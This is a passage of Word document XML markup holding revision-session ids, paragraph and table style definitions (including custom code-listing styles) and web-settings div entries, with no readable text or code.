    <w:rsid w:val="00555F5B"/>
    <w:rsid w:val="00556133"/>
    <w:rsid w:val="0055639E"/>
    <w:rsid w:val="0056593D"/>
    <w:rsid w:val="00567B5C"/>
    <w:rsid w:val="00580720"/>
    <w:rsid w:val="00581DBE"/>
    <w:rsid w:val="00581FB9"/>
    <w:rsid w:val="0058427B"/>
    <w:rsid w:val="005A6340"/>
    <w:rsid w:val="005D1352"/>
    <w:rsid w:val="005D3AC9"/>
    <w:rsid w:val="005E496E"/>
    <w:rsid w:val="00605848"/>
    <w:rsid w:val="00611794"/>
    <w:rsid w:val="0061682E"/>
    <w:rsid w:val="00622F5C"/>
    <w:rsid w:val="00623886"/>
    <w:rsid w:val="0062558E"/>
    <w:rsid w:val="00631614"/>
    <w:rsid w:val="00646037"/>
    <w:rsid w:val="00663942"/>
    <w:rsid w:val="006776BD"/>
    <w:rsid w:val="006903D1"/>
    <w:rsid w:val="006A0B0C"/>
    <w:rsid w:val="006C5A4E"/>
    <w:rsid w:val="006C5C9E"/>
    <w:rsid w:val="006E5D6F"/>
    <w:rsid w:val="006E75C0"/>
    <w:rsid w:val="006F5E52"/>
    <w:rsid w:val="0070558B"/>
    <w:rsid w:val="00707178"/>
    <w:rsid w:val="007111FE"/>
    <w:rsid w:val="00712CB9"/>
    <w:rsid w:val="00724956"/>
    <w:rsid w:val="00727036"/>
    <w:rsid w:val="007431EA"/>
    <w:rsid w:val="007506C7"/>
    <w:rsid w:val="00752C47"/>
    <w:rsid w:val="00767735"/>
    <w:rsid w:val="007704F1"/>
    <w:rsid w:val="00773E44"/>
    <w:rsid w:val="00795B79"/>
    <w:rsid w:val="007B3BA5"/>
    <w:rsid w:val="007B579A"/>
    <w:rsid w:val="007B5BF7"/>
    <w:rsid w:val="007E1592"/>
    <w:rsid w:val="007F755A"/>
    <w:rsid w:val="008005E2"/>
    <w:rsid w:val="00840BBB"/>
    <w:rsid w:val="00844825"/>
    <w:rsid w:val="00847435"/>
    <w:rsid w:val="00873C76"/>
    <w:rsid w:val="0087746D"/>
    <w:rsid w:val="00882783"/>
    <w:rsid w:val="00884BFC"/>
    <w:rsid w:val="00884CD5"/>
    <w:rsid w:val="008912FE"/>
    <w:rsid w:val="00893083"/>
    <w:rsid w:val="00894F5A"/>
    <w:rsid w:val="008C4153"/>
    <w:rsid w:val="008C4490"/>
    <w:rsid w:val="008C4B44"/>
    <w:rsid w:val="008D5AF3"/>
    <w:rsid w:val="008F1035"/>
    <w:rsid w:val="008F4C00"/>
    <w:rsid w:val="009240CB"/>
    <w:rsid w:val="009571A6"/>
    <w:rsid w:val="00996E4A"/>
    <w:rsid w:val="009A100A"/>
    <w:rsid w:val="009B0E35"/>
    <w:rsid w:val="009C1C11"/>
    <w:rsid w:val="009C27BB"/>
    <w:rsid w:val="009F3B92"/>
    <w:rsid w:val="00A154A9"/>
    <w:rsid w:val="00A2128A"/>
    <w:rsid w:val="00A23916"/>
    <w:rsid w:val="00A26E1B"/>
    <w:rsid w:val="00A30EF8"/>
    <w:rsid w:val="00A34711"/>
    <w:rsid w:val="00A44D04"/>
    <w:rsid w:val="00A65435"/>
    <w:rsid w:val="00AB0599"/>
    <w:rsid w:val="00AC02C3"/>
    <w:rsid w:val="00AC67FD"/>
    <w:rsid w:val="00AE6477"/>
    <w:rsid w:val="00AF0191"/>
    <w:rsid w:val="00AF28CF"/>
    <w:rsid w:val="00AF55AB"/>
    <w:rsid w:val="00AF642F"/>
    <w:rsid w:val="00B00365"/>
    <w:rsid w:val="00B0080A"/>
    <w:rsid w:val="00B00C0C"/>
    <w:rsid w:val="00B01FDA"/>
    <w:rsid w:val="00B024C7"/>
    <w:rsid w:val="00B2426F"/>
    <w:rsid w:val="00B24F36"/>
    <w:rsid w:val="00B32A19"/>
    <w:rsid w:val="00B35B88"/>
    <w:rsid w:val="00B40A5B"/>
    <w:rsid w:val="00B43BE0"/>
    <w:rsid w:val="00B47DC6"/>
    <w:rsid w:val="00B51413"/>
    <w:rsid w:val="00B51483"/>
    <w:rsid w:val="00B648B1"/>
    <w:rsid w:val="00B920E2"/>
    <w:rsid w:val="00B9631D"/>
    <w:rsid w:val="00BA5F4C"/>
    <w:rsid w:val="00BB1E6F"/>
    <w:rsid w:val="00BF1F81"/>
    <w:rsid w:val="00BF2359"/>
    <w:rsid w:val="00BF2F28"/>
    <w:rsid w:val="00BF422F"/>
    <w:rsid w:val="00C03931"/>
    <w:rsid w:val="00C0551F"/>
    <w:rsid w:val="00C30C78"/>
    <w:rsid w:val="00C31DCD"/>
    <w:rsid w:val="00C32533"/>
    <w:rsid w:val="00C528B6"/>
    <w:rsid w:val="00C566FB"/>
    <w:rsid w:val="00C56DB6"/>
    <w:rsid w:val="00C6225E"/>
    <w:rsid w:val="00C63F04"/>
    <w:rsid w:val="00C670F2"/>
    <w:rsid w:val="00C677DB"/>
    <w:rsid w:val="00C85002"/>
    <w:rsid w:val="00C946BD"/>
    <w:rsid w:val="00C96695"/>
    <w:rsid w:val="00CA0D10"/>
    <w:rsid w:val="00CA4C6E"/>
    <w:rsid w:val="00CC110D"/>
    <w:rsid w:val="00CE4CE0"/>
    <w:rsid w:val="00CF3BF6"/>
    <w:rsid w:val="00D139EB"/>
    <w:rsid w:val="00D21F47"/>
    <w:rsid w:val="00D22A7D"/>
    <w:rsid w:val="00D36A3C"/>
    <w:rsid w:val="00D36E2B"/>
    <w:rsid w:val="00D663A7"/>
    <w:rsid w:val="00D70417"/>
    <w:rsid w:val="00D757EC"/>
    <w:rsid w:val="00D76281"/>
    <w:rsid w:val="00D847D3"/>
    <w:rsid w:val="00DA733E"/>
    <w:rsid w:val="00DA7649"/>
    <w:rsid w:val="00DB49B6"/>
    <w:rsid w:val="00DB7049"/>
    <w:rsid w:val="00DD64D1"/>
    <w:rsid w:val="00DD6B18"/>
    <w:rsid w:val="00E01DB7"/>
    <w:rsid w:val="00E03870"/>
    <w:rsid w:val="00E07CD2"/>
    <w:rsid w:val="00E132E9"/>
    <w:rsid w:val="00E222D3"/>
    <w:rsid w:val="00E23C61"/>
    <w:rsid w:val="00E2738D"/>
    <w:rsid w:val="00E34796"/>
    <w:rsid w:val="00E61686"/>
    <w:rsid w:val="00E676B6"/>
    <w:rsid w:val="00E7302F"/>
    <w:rsid w:val="00E73F01"/>
    <w:rsid w:val="00E74675"/>
    <w:rsid w:val="00E92C56"/>
    <w:rsid w:val="00EB2EDB"/>
    <w:rsid w:val="00EB4C33"/>
    <w:rsid w:val="00EB5499"/>
    <w:rsid w:val="00EC1941"/>
    <w:rsid w:val="00EC23F2"/>
    <w:rsid w:val="00EC5C7C"/>
    <w:rsid w:val="00EE1E0C"/>
    <w:rsid w:val="00F04A40"/>
    <w:rsid w:val="00F1550C"/>
    <w:rsid w:val="00F3034E"/>
    <w:rsid w:val="00F30C51"/>
    <w:rsid w:val="00F31F10"/>
    <w:rsid w:val="00F351BE"/>
    <w:rsid w:val="00F369E3"/>
    <w:rsid w:val="00F56DE3"/>
    <w:rsid w:val="00F62F5D"/>
    <w:rsid w:val="00F66181"/>
    <w:rsid w:val="00FA04FE"/>
    <w:rsid w:val="00FA052B"/>
    <w:rsid w:val="00FB2E75"/>
    <w:rsid w:val="00FC1E78"/>
    <w:rsid w:val="00FD4229"/>
    <w:rsid w:val="00FE225F"/>
    <w:rsid w:val="00FE468E"/>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A87"/>
  <w15:docId w15:val="{7450777B-52D1-4731-AF06-840638C3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E2"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00011DBA"/>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1682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E23C61"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="192D3A" w:themeColor="text2" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FD4229"/>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646037"/>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DBA"/>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61682E"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent2">
    <w:name w:val="Grid Table 4 Accent 2"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>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
    <w:name w:val="Grid Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00616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1682E"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0061682E"/>
    <w:rPr>
      <w:color w:val="192D3A" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00E23C61"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="192D3A" w:themeColor="text2" w:themeShade="80"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading4Char">
    <w:name w:val="Heading 4 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD4229"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="006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92"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E34796"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008C4B44"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ListTable4">
    <w:name w:val="List Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="0052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4D0"/>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Style1">
    <w:name w:val="Style1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="005264D0"/>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tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:b/>
        <w:color w:val="FFFFFF" w:themeColor="background1"/>
      </w:rPr>
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="595959" w:themeFill="text1" w:themeFillTint="A6"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D1EEF9" w:themeFill="accent1" w:themeFillTint="33"/>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37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FB"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0037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FB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading5Char">
    <w:name w:val="Heading 5 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading5"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00646037"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="1481AB" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code">
    <w:name w:val="Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CodeChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="007111FE"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CodeChar">
    <w:name w:val="Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Code"/>
    <w:rsid w:val="007111FE"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>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rsid w:val="00055045"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00055045"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="omittedforbrevity">
    <w:name w:val="omitted for brevity"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="omittedforbrevityChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:color w:val="0070C0"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Important">
    <w:name w:val="Important"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="ImportantChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="omittedforbrevityChar">
    <w:name w:val="omitted for brevity Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="omittedforbrevity"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:color w:val="0070C0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BoxCode">
    <w:name w:val="Box Code"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="BoxCodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ImportantChar">
    <w:name w:val="Important Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="Important"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="C00000"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BoxCodeChar">
    <w:name w:val="Box Code Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="BoxCode"/>
    <w:rsid w:val="003C219B"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NormalWebChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00840B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Cap">
    <w:name w:val="Fig-Cap"/>
    <w:basedOn w:val="NormalWeb"/>
    <w:link w:val="Fig-CapChar"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:rsid w:val="00111129"/>
    <w:pPr>
      <w:spacing w:before="0" w:beforeAutospacing="0" w:after="200" w:afterAutospacing="0"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="minorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NormalWebChar">
    <w:name w:val="Normal (Web) Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="NormalWeb"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="002E0856"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Fig-CapChar">
    <w:name w:val="Fig-Cap Char"/>
    <w:basedOn w:val="NormalWebChar"/>
    <w:link w:val="Fig-Cap"/>
    <w:rsid w:val="00111129"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009C27BB"/>
    <w:rPr>
      <w:color w:val="13676B" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="LineCode">
    <w:name w:val="Line Code"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="LineCodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00186F08"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="LineCodeChar">
    <w:name w:val="Line Code Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="LineCode"/>
    <w:rsid w:val="00186F08"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Small-Code">
    <w:name w:val="Small-Code"/>
    <w:basedOn w:val="Code"/>
    <w:link w:val="Small-CodeChar"/>
    <w:qFormat/>
    <w:rsid w:val="00186F08"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Small-CodeChar">
    <w:name w:val="Small-Code Char"/>
    <w:basedOn w:val="CodeChar"/>
    <w:link w:val="Small-Code"/>
    <w:rsid w:val="00186F08"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consola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5044">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="136076555">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="271867003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="328292103">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="333187948">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="397485684">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="412892657">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="422607536">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="440614864">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="461460244">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="494805672">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="502361909">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
